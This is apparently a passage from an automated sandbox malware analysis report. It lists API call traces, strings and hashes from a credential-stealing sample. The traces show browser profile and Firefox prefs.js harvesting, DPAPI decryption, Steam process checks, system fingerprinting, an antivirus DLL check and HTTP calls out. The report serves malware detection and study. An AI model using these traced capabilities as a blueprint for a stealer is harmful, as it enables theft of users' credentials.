                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                        • API String ID: 2567437900-1710495004
                                                                                                                                                        APIs
                                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                        • _memset.LIBCMT ref: 004151E5
                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                          • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                          • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                        • API String ID: 441469471-147700698
                                                                                                                                                        • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                        • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                                                        • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                        • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1116797323-1173974218
                                                                                                                                                        • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                        • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                        • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                        • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                        • String ID: prefs.js
                                                                                                                                                        • API String ID: 893096357-3783873740
                                                                                                                                                        • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                        • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                        • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                        • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3801961486-0
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                        • String ID: steam.exe
                                                                                                                                                        • API String ID: 1799959500-2826358650
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                        • String ID: /
                                                                                                                                                        • API String ID: 507856799-4001269591
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1799959500-0
                                                                                                                                                        APIs
                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                        • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                        • String ID: DPAPI
                                                                                                                                                        • API String ID: 2068576380-1690256801
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 907984538-0
                                                                                                                                                        • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                        • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                                                        • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                        • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                        • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                        • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                        • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                                                        • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                        • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                        • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                        • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                                                        • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                        • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                        • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                        • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                                                        • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                        • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                        • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                        • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                                                        • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                        • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        [Figure: control-flow graph starting at node 29 (405482-405593); legend: Executed / Not Executed. Calls named in the graph include InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle and ExitProcess.]
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                          • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                          • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                          • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
